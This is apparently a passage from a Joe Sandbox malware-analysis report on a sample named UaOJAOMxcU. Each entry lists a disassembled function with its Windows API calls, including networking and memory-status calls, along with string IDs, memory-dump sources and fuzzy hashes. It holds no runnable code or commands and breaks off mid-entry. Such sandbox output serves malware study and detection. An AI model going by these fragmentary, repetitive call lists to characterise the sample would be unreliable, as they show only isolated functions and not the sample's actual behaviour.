                    Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00412968
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                    • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                    • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                    • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                    Function 00469734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00404F0B: __fread_nolock.LIBCMT ref: 00404F29
                    • _wcscmp.LIBCMT ref: 00469824
                    • _wcscmp.LIBCMT ref: 00469837
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
                    • Instruction ID: cde52b3ca8712c625de002da450250744642bb9d8a04c3b997614ed6dba67ccd
                    • Opcode Fuzzy Hash: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
                    • Instruction Fuzzy Hash: 8C41A771A0021ABADF20AAA5CC45FEF77BDDF85714F00047EB604B7181DA79AD058B69
                    Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID: DdL$DdL
                    • API String ID: 1473721057-91670653
                    • Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                    • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                    • Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                    • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                    Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0047259E
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                    • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                    • Opcode Fuzzy Hash: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                    • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                    Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                    • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                    • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                    • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                    Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00462911
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: dcac2d535079ed9cd08b3b53e8268d9c526be6351065196aed15e3907edf445b
                    • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                    • Opcode Fuzzy Hash: dcac2d535079ed9cd08b3b53e8268d9c526be6351065196aed15e3907edf445b
                    • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                    Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                    • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                    • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                    • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                    Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                      • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                      • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                    • GetWindowRect.USER32(00000000,?), ref: 00486C71
                    • GetSysColor.USER32(00000012), ref: 00486C8B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                    • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                    • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                    • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                    Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                    • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                    • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                    • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                    Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00462A22
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                    • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                    • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                    • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                    Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                    • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                    • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                    • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                    Function 0041092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • _wcscat.LIBCMT ref: 00444CB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FullNamePath_memmove_wcscat
                    • String ID: SL
                    • API String ID: 257928180-181245872
                    • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                    • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                    • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                    • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                    Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
                    • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                    • Opcode Fuzzy Hash: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
                    • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                    Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
                    • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                    • Opcode Fuzzy Hash: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
                    • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                    Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
                    • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                    • Opcode Fuzzy Hash: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
                    • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                    Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 0045C534
                      • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                      • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                      • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                    • VariantClear.OLEAUT32(?), ref: 0045C556
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
